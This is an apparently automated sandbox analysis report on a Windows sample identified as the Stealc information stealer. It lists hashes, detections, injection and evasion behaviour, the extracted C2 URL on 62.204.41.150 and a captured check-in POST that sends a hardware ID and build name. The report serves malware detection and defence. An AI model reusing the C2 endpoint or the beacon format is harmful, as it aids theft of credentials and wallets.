Windows Analysis Report
Aew8SXjXEb.exe

Overview

General Information

Sample name: Aew8SXjXEb.exe
renamed because original name is a hash value
Original sample name: c89c82ab6576a83a2a32bbffe44ef4d7.exe
Analysis ID: 1528328
MD5: c89c82ab6576a83a2a32bbffe44ef4d7
SHA1: 7a1db4e5bcdbcfa1fcd8591d2e3ee8708ab41a02
SHA256: 11cb48154b2285d427e5f3bff51c1dde9f59a8b8cfd04fa4d3d3f6e4b0124d44
Tags: 32exetrojan
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sigma detected: Silenttrinity Stager Msbuild Activity
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Aew8SXjXEb.exe Avira: detected
Found malware configuration
Source: 0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpack Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"}
Multi AV Scanner detection for submitted file
Source: Aew8SXjXEb.exe ReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: Aew8SXjXEb.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: Aew8SXjXEb.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.8:49747 version: TLS 1.0
Source: Aew8SXjXEb.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_00639ABF FindFirstFileExW, 0_2_00639ABF

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49707 -> 62.204.41.150:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://62.204.41.150/edd20096ecef326d.php
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 46 35 45 32 34 46 39 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="hwid"EFF5E24F91144293944220------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="build"default6_doz------EHDAAECAEBKJKFHJKECF--
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.8:49747 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00406280 InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile, 1_2_00406280
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 46 35 45 32 34 46 39 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="hwid"EFF5E24F91144293944220------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="build"default6_doz------EHDAAECAEBKJKFHJKECF--
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/J
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/L
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/S
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/Y
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php0
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php5
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php;
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpi
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpoca.
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpu
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpx&
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/z
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150E
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150G
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150ig
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Detected potential crypto function
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_00622021 0_2_00622021
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_0062729C 0_2_0062729C
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_0063D39B 0_2_0063D39B
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_0063572C 0_2_0063572C
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_0067094F 0_2_0067094F
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_0062CAF2 0_2_0062CAF2
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_0063BB36 0_2_0063BB36
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_00633C92 0_2_00633C92
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_00621D79 0_2_00621D79
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_0062FEF0 0_2_0062FEF0
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: String function: 00627B80 appears 49 times
One or more processes crash
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 272
Sample file is different than original file name gathered from version info
Source: Aew8SXjXEb.exe, 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameproquota.exej% vs Aew8SXjXEb.exe
Source: Aew8SXjXEb.exe Binary or memory string: OriginalFilenameproquota.exej% vs Aew8SXjXEb.exe
Uses 32bit PE files
Source: Aew8SXjXEb.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Aew8SXjXEb.exe Static PE information: Section: .data ZLIB complexity 0.989946875
Source: classification engine Classification label: mal100.troj.evad.winEXE@4/5@0/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\96C2XD62.htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6032
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\5ea91f23-f66c-476a-af3c-5caf6efefdec Jump to behavior
Source: Aew8SXjXEb.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Aew8SXjXEb.exe ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Users\user\Desktop\Aew8SXjXEb.exe "C:\Users\user\Desktop\Aew8SXjXEb.exe"
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 272
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Aew8SXjXEb.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Aew8SXjXEb.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Aew8SXjXEb.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Aew8SXjXEb.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Aew8SXjXEb.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Aew8SXjXEb.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Aew8SXjXEb.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Aew8SXjXEb.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Aew8SXjXEb.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Aew8SXjXEb.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Aew8SXjXEb.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Aew8SXjXEb.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Aew8SXjXEb.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_0041C03D
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_006271AD push ecx; ret 0_2_006271C0
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_00667F0D push ecx; ret 0_2_00667F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041B035 push ecx; ret 1_2_0041B048
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
